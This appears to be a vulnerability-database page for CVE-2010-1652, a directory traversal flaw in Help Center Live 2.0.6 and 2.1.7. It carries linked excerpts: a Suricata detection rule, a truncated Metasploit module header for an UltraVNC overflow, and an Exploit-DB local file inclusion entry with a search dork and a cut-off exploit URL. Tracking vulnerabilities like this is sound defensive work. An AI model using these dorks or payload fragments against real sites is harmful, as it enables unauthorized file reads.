CVE-2010-1652
published 2010-05-03CVE-2010-1652: Directory traversal vulnerability in the HelpCenter module in Help Center Live (HCL) 2.0.6 and 2.1.7 allows remote attackers to read arbitrary files and…
PriorityP430medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.86%
85.0th percentile
Directory traversal vulnerability in the HelpCenter module in Help Center Live (HCL) 2.0.6 and 2.1.7 allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the file parameter to module.php. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| helpcenterlive | hcl | — | — |
| helpcenterlive | hcl | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL POP3 APOP overflow attempt
suricata·2010-09-23
CVE-2000-0840 GPL POP3 APOP overflow attempt
GPL POP3 APOP overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 110 (msg:"GPL POP3 APOP overflow attempt"; flow:established,to_server; content:"APOP"; nocase; isdataat:256,relative; pcre:"/^APOP\s[^\n]{256}/smi"; reference:bugtraq,1652; reference:cve,2000-0840; reference:cve,2000-0841; reference:nessus,10559; classtype:attempted-admin; sid:2101635; rev:15; metadata:created_at 2010_09_23, cve CVE_2000_0840, confidence Medium, signature_severity Major, updated_at 2024_03_08;)
Exploit-DB
UltraVNC 1.0.1 - Client Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-1652 UltraVNC 1.0.1 - Client Buffer Overflow (Metasploit)
UltraVNC 1.0.1 - Client Buffer Overflow (Metasploit)
---
##
# $Id: ultravnc_client.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'UltraVNC 1.0.1 Client Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in UltraVNC Win32
Viewer 1.0.1 Release.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2006-1652' ],
[ 'OSVDB', '24456' ],
[ 'BID', '17378' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars'
Exploit-DB
Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion
exploitdb·2010-04-27
CVE-2010-1652 Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion
Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion
---
# Exploit Title: Help Center Live 2.0.6(module=helpcenter&file=) Local File
Inclusion
# Date: 27-4-2010
# Author: 41.w4r10r
# Software Link :
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork : inurl:"module=helpcenter"
# Code :
############################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
Warriors]
#Thanks:
SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################
[+] Exploit
http://example.com/[path]/module.php?module=
No writeups or analysis indexed.
http://packetstormsecurity.org/1004-exploits/helpcenterlive-lfi.txthttp://secunia.com/advisories/39615http://www.exploit-db.com/exploits/12421http://www.securityfocus.com/bid/39732http://www.vupen.com/english/advisories/2010/1009http://packetstormsecurity.org/1004-exploits/helpcenterlive-lfi.txthttp://secunia.com/advisories/39615http://www.exploit-db.com/exploits/12421http://www.securityfocus.com/bid/39732http://www.vupen.com/english/advisories/2010/1009
2010-05-03
Published